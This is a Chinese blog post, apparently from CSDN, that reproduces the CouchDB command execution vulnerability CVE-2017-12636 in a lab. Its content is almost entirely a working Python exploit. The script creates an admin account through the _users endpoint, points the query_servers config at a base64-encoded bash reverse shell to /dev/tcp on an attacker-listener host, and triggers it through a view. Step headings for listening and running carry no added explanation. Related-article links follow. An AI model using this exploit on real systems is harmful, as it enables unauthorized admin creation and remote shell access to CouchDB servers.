Couchdb 任意命令执行漏洞(CVE-2017-12636)

最新推荐文章于 2024-04-17 08:14:01 发布
最新推荐文章于 2024-04-17 08:14:01 发布
阅读量744 收藏 12
点赞数 10
文章标签: 安全 couchdb 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46239998/article/details/135328623
版权

一、环境搭建

二、访问

三、构造payload

#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth

target = 'http://192.168.217.128:5984'    # 目标ip
command = rb"""sh -i >& /dev/tcp/192.168.217.128/5566 0>&1""" # 这里的ip为监听机ip也就是攻击机
version = 1

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
# session.proxies = {
#     'http': 'http://127.0.0.1:8085'
# }
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')
session.auth = HTTPBasicAuth('wooyun', 'wooyun')
command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))

session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

四、开启监听

五、运行脚本

六、查看效果

如上图所示即反弹shell成功!​

黄公子学安全
关注
  • 10
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 363
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
Kitura-CouchDB:用于Kitura的CouchDB适配器
02-03
Kitura-CouchDB:用于Kitura的CouchDB适配器
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
CVE-2021-22205——Gitlab 远程命令执行漏洞复现(2),剖析网络安全开发未来的出路在哪里
最新发布
2301_76225520的博客
04-17 84
朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~print(“[-] 目标 {} 不存在漏洞”.format(target_url))print(“[-] 目标 {} 不存在漏洞”.format(target_url))print(”[+] 目标 {} 存在漏洞".format(target_url))
CouchDBClient:CouchDB客户端-.NET客户端框架,用于使用CouchDB
02-03
CouchDBClient(CouchDB .NET客户端) CouchDBClient是用于从.NET代码使用CouchDB的框架。 它抽象化并简化了CouchDB的用法,因此您可以轻松地从应用程序代码中使用它。 在框架下掩盖了使用纯json和http请求/响应的所有复杂性。 使用此框架,您将能够创建,检索,保存和删除作为纯对象的文档。 安装CouchDBClient Nuget Install-Package CouchDBClient - Version 1.0 . 0 CouchDBClient背后的故事 我试图使CouchDBClient更加友好以使用自定义对象-这就是应用程序通常存储在数据库中的内容。 早在我开始编写此框架时,我发现并尝试过的所有其他方法都给人留下了非标准化方法签名(使用各种约定进行命名并且更难猜测其作用)的印象,而不是统一的接口(有关字符串文档的某些操作,而其他一些围绕json docs的文档),不是非常灵活(某些仅用于字符串,其他仅用于对象),或者不是非常抽象(必须先了解CouchDB REST API才能正确使用它们)。 我假设并希望它们从那时起
couchdb-orm:一个简单的CouchDB ORM
02-04
couchdb-orm:一个简单的CouchDB ORM
谷歌再次修复已遭利用的两枚高危0day (CVE-2020-16009/16010)
smellycat000的专栏
11-03 432
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队今天,谷歌为 Chrome Web 浏览器发布安全更新,修复了10个安全漏洞,其中包括两个目前已遭利用的高危0day:CVE...
Couchdb数据库-命令执行漏洞复现-CVE-2017-12636
apple_52661176的博客
08-31 184
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。0>&1""" #攻击机ip。开启vulfocus靶场环境。在攻击机上开启nc监听。
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2017-12636
利他者利己,利己者无功。利他利己,利己利他。
10-22 687
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞
Couchdb 命令执行漏洞复现 (CVE-2017-12636
XXokok的博客
11-25 262
Couchdb 命令执行漏洞复现 (CVE-2017-12636
Couchdb 任意命令执行漏洞CVE-2017-12636
weixin_44311721的博客
07-30 1403
Couchdb 任意命令执行漏洞CVE-2017-12636Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的...
安全狗高危安全通告」Apache CouchDB 远程代码执行漏洞
bocco的博客
04-28 459
近日,安全狗应急响应中心监测到,Apache CouchDB官方发布了安全通告,漏洞编号为CVE-2022-24706。可导致远程攻击者获得管理员权限等危害。
IOS安全测试学习-DVIA-v2
qq_45414878的博客
11-24 1613
IOS靶场初探,学习IOS安全机制和常见的漏洞
[免费专栏] Android安全之数据存储与数据安全「详解」
橙留香Park的博客
08-08 6776
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
Couchdb 任意命令执行漏洞CVE-2017-12636)复现
HEAVEN569的博客
06-21 1008
Couchdb 任意命令执行漏洞CVE-2017-12636)复现
couchdb 任意命令执行漏洞 cve-2017-12636
whatday的专栏
01-30 312
Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 漏洞简介: CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Obj
CouchDB任意命令执行CVE-2017-12636
Kevin's Blog
07-26 945
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问,CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
6f940c91ee6c hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:5984->5984/tcp couchdb0 b38fcba5811f hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:8984->5984/tcp couchdb3 f35978830422 hyperledger/fabric-couchdb "tini -- /docker-e..." 4 days ago Up 4 days 4369/tcp, 9100/tcp, 0.0.0.0:6984->5984/tcp couchdb1
05-24
这是一个运行了三个 CouchDB 容器的 Docker 服务。这些容器的镜像来自于 Hyperledger Fabric 项目,用于支持区块链网络的数据存储和查询。每个容器都暴露了不同的端口,其中 5984 是 CouchDB 的默认端口,8984 和 6984 是自定义的端口。容器分别命名为 couchdb0、couchdb1 和 couchdb3。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值